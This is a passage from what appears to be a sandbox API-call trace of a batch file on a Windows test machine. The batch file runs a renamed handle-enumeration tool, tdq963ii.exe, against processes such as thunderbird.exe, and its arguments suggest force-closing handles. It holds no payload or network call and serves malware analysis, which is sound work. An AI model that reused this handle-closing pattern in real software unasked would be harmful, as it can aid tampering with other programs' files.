returned 0x2 [0200.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.565] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0200.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.566] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x2) returned 1 [0200.566] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f654 | out: _Buffer="\r\n") returned 2 [0200.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.566] GetFileType (hFile=0x7) returned 0x2 [0200.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f614 | out: lpMode=0x26f614) returned 1 [0200.567] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.567] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f640, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f640*=0x2) returned 1 [0200.569] GetProcessHeap () returned 0x590000 [0200.569] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x5a4428 [0200.569] GetProcessHeap () returned 0x590000 [0200.569] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc) returned 0x590db8 [0200.569] GetProcessHeap () returned 0x590000 [0200.569] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc) returned 0x590dd0 [0200.569] GetProcessHeap () returned 0x590000 [0200.570] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x590de8 [0200.570] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0200.570] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0200.570] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0200.570] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0200.570] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0200.570] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0200.570] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0200.570] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x26f570, _Radix=0 | out: _EndPtr=0x26f570*=",6 delims=: \"") returned 3 [0200.570] wcstol (in: _String="6 delims=: \"", _EndPtr=0x26f570, _Radix=0 | out: _EndPtr=0x26f570*=" delims=: \"") returned 6 [0200.570] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0200.570] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0200.570] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0200.570] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0200.570] GetProcessHeap () returned 0x590000 [0200.571] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590de8 | out: hHeap=0x590000) returned 1 [0200.571] GetProcessHeap () returned 0x590000 [0200.571] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x590de8 [0200.571] GetProcessHeap () returned 0x590000 [0200.571] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x590db8, Size=0xe) returned 0x590e00 [0200.571] GetProcessHeap () returned 0x590000 [0200.571] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x590e00) returned 0xe [0200.571] GetProcessHeap () returned 0x590000 [0200.571] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x590dd0, Size=0x14) returned 0x5a4460 [0200.571] GetProcessHeap () returned 0x590000 [0200.571] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4460) returned 0x14 [0200.571] _wpopen (_Command="tdq963ii.exe -accepteula \"thunderbird.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0201.071] feof (_File=0x77032960) returned 0 [0201.071] ferror (_File=0x77032960) returned 0 [0201.071] GetProcessHeap () returned 0x590000 [0201.071] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x108) returned 0x5a4480 [0201.071] fgets (in: _Buf=0x5a4488, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0207.311] feof (_File=0x77032960) returned 0 [0207.311] ferror (_File=0x77032960) returned 0 [0207.311] GetProcessHeap () returned 0x590000 [0207.311] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4480, Size=0x208) returned 0x5a4480 [0207.311] GetProcessHeap () returned 0x590000 [0207.311] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4480) returned 0x208 [0207.311] fgets (in: _Buf=0x5a44ce, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0207.311] feof (_File=0x77032960) returned 0 [0207.312] ferror (_File=0x77032960) returned 0 [0207.312] GetProcessHeap () returned 0x590000 [0207.312] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4480, Size=0x308) returned 0x5a4480 [0207.312] GetProcessHeap () returned 0x590000 [0207.312] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4480) returned 0x308 [0207.312] fgets (in: _Buf=0x5a44d1, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0211.650] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0211.652] GetProcessHeap () returned 0x590000 [0211.652] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4480, Size=0x9e) returned 0x5a4480 [0211.652] GetProcessHeap () returned 0x590000 [0211.652] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4480) returned 0x9e [0211.652] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x5a44d1, cbMultiByte=73, lpWideCharStr=0x5a4488, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0211.653] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f264 | out: _Buffer="\r\n") returned 2 [0211.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.653] GetFileType (hFile=0x7) returned 0x2 [0211.654] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.654] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f224 | out: lpMode=0x26f224) returned 1 [0211.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.654] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f250, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f250*=0x2) returned 1 [0211.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0211.657] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f260 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0211.658] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f260 | out: _Buffer=">") returned 1 [0211.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.658] GetFileType (hFile=0x7) returned 0x2 [0211.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f228 | out: lpMode=0x26f228) returned 1 [0211.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.659] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x26f254, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x26f254*=0x26) returned 1 [0211.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.660] GetFileType (hFile=0x7) returned 0x2 [0211.660] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.660] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f4ac | out: lpMode=0x26f4ac) returned 1 [0211.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.661] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x26f4d8, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x26f4d8*=0x1) returned 1 [0211.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.661] GetFileType (hFile=0x7) returned 0x2 [0211.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f490 | out: lpMode=0x26f490) returned 1 [0211.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.662] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5b4b30*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x26f4bc, lpReserved=0x0 | out: lpBuffer=0x5b4b30*, lpNumberOfCharsWritten=0x26f4bc*=0xc) returned 1 [0211.662] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x26f4c8 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0211.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.662] GetFileType (hFile=0x7) returned 0x2 [0211.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f488 | out: lpMode=0x26f488) returned 1 [0211.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.663] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x26f4b4, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f4b4*=0x2c) returned 1 [0211.665] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x26f4e4 | out: _Buffer=") ") returned 2 [0211.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.665] GetFileType (hFile=0x7) returned 0x2 [0211.665] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.665] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f4a4 | out: lpMode=0x26f4a4) returned 1 [0211.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.666] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f4d0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f4d0*=0x2) returned 1 [0211.666] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f504 | out: _Buffer="\r\n") returned 2 [0211.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.666] GetFileType (hFile=0x7) returned 0x2 [0211.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f4c4 | out: lpMode=0x26f4c4) returned 1 [0211.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.667] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f4f0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f4f0*=0x2) returned 1 [0211.668] GetConsoleTitleW (in: lpConsoleTitle=0x26f014, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.670] GetConsoleTitleW (in: lpConsoleTitle=0x26eda8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.670] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ec30, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ecf8 | out: lpAttributeList=0x26ec30, lpSize=0x26ecf8) returned 1 [0211.670] UpdateProcThreadAttribute (in: lpAttributeList=0x26ec30, dwFlags=0x0, Attribute=0x60001, lpValue=0x26ecf0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ec30, lpPreviousValue=0x0) returned 1 [0211.670] GetStartupInfoW (in: lpStartupInfo=0x26ebec | out: lpStartupInfo=0x26ebec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0211.686] CloseHandle (hObject=0x84) returned 1 [0211.686] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.686] GetProcessHeap () returned 0x590000 [0211.686] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a76d0 | out: hHeap=0x590000) returned 1 [0211.686] GetEnvironmentStringsW () returned 0x5a6b40* [0211.686] GetProcessHeap () returned 0x590000 [0211.686] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb86) returned 0x5a76d0 [0211.686] FreeEnvironmentStringsW (penv=0x5a6b40) returned 1 [0211.686] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0223.256] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x26ebcc | out: lpExitCode=0x26ebcc*=0x1) returned 1 [0223.257] CloseHandle (hObject=0x74) returned 1 [0223.257] _vsnwprintf (in: _Buffer=0x26ed14, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ebd8 | out: _Buffer="00000001") returned 8 [0223.257] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0223.257] GetProcessHeap () returned 0x590000 [0223.257] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a76d0 | out: hHeap=0x590000) returned 1 [0223.257] GetEnvironmentStringsW () returned 0x5a6b40* [0223.257] GetProcessHeap () returned 0x590000 [0223.257] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb86) returned 0x5a76d0 [0223.257] FreeEnvironmentStringsW (penv=0x5a6b40) returned 1 [0223.257] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.257] GetProcessHeap () returned 0x590000 [0223.257] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a76d0 | out: hHeap=0x590000) returned 1 [0223.257] GetEnvironmentStringsW () returned 0x5a6b40* [0223.258] GetProcessHeap () returned 0x590000 [0223.258] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb86) returned 0x5a76d0 [0223.258] FreeEnvironmentStringsW (penv=0x5a6b40) returned 1 [0223.258] GetProcessHeap () returned 0x590000 [0223.258] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590dd0 | out: hHeap=0x590000) returned 1 [0223.258] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ec30 | out: lpAttributeList=0x26ec30) [0223.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.259] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.259] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0223.260] _get_osfhandle (_FileHandle=0) returned 0x3 [0223.260] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0223.260] SetConsoleInputExeNameW () returned 0x1 [0223.260] GetConsoleOutputCP () returned 0x1b5 [0223.261] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0223.261] SetThreadUILanguage (LangId=0x0) returned 0x409 [0223.261] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f5fc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0223.262] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0223.262] _get_osfhandle (_FileHandle=3) returned 0x74 [0223.262] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0223.262] GetProcessHeap () returned 0x590000 [0223.262] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4a98 | out: hHeap=0x590000) returned 1 [0223.262] GetProcessHeap () returned 0x590000 [0223.262] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4968 | out: hHeap=0x590000) returned 1 [0223.262] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4840 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a47c8 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4740 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4528 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b70 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b28 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590de8 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4460 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590e00 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.263] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4428 | out: hHeap=0x590000) returned 1 [0223.263] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a43c8 | out: hHeap=0x590000) returned 1 [0223.264] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4398 | out: hHeap=0x590000) returned 1 [0223.264] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4338 | out: hHeap=0x590000) returned 1 [0223.264] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42d8 | out: hHeap=0x590000) returned 1 [0223.264] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4258 | out: hHeap=0x590000) returned 1 [0223.264] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4200 | out: hHeap=0x590000) returned 1 [0223.264] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a41e0 | out: hHeap=0x590000) returned 1 [0223.264] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4190 | out: hHeap=0x590000) returned 1 [0223.264] GetProcessHeap () returned 0x590000 [0223.264] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591258 | out: hHeap=0x590000) returned 1 [0223.265] _get_osfhandle (_FileHandle=3) returned 0x74 [0223.265] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0223.265] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f5e0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x26f5e0*=0x0, lpOverlapped=0x0) returned 1 [0223.265] GetLastError () returned 0x0 [0223.265] _get_osfhandle (_FileHandle=3) returned 0x74 [0223.265] GetFileType (hFile=0x74) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=3) returned 0x74 [0223.266] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0223.266] GetProcessHeap () returned 0x590000 [0223.266] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4b28 [0223.266] GetProcessHeap () returned 0x590000 [0223.266] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b28 | out: hHeap=0x590000) returned 1 [0223.266] _get_osfhandle (_FileHandle=3) returned 0x74 [0223.266] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0223.267] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f5c4, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x26f5c4*=0x0, lpOverlapped=0x0) returned 1 [0223.267] GetLastError () returned 0x0 [0223.267] _get_osfhandle (_FileHandle=3) returned 0x74 [0223.267] GetFileType (hFile=0x74) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=3) returned 0x74 [0223.267] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0223.267] GetProcessHeap () returned 0x590000 [0223.267] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4b28 [0223.267] GetProcessHeap () returned 0x590000 [0223.267] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b28 | out: hHeap=0x590000) returned 1 [0223.267] longjmp () [0223.267] _tell (_FileHandle=3) returned 226 [0223.267] _close (_FileHandle=3) returned 0 [0223.268] CmdBatNotification () returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.268] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.268] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0223.269] _get_osfhandle (_FileHandle=0) returned 0x3 [0223.269] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0223.269] SetConsoleInputExeNameW () returned 0x1 [0223.269] GetConsoleOutputCP () returned 0x1b5 [0223.269] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0223.269] SetThreadUILanguage (LangId=0x0) returned 0x409 [0223.270] exit (_Code=1) Process: id = "164" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x309fe000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "158" os_parent_pid = "0x614" cmd_line = "tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 681 os_tid = 0x224 [0173.499] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0173.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0173.501] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0173.502] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0173.503] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0173.503] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0173.503] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0173.503] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0173.503] 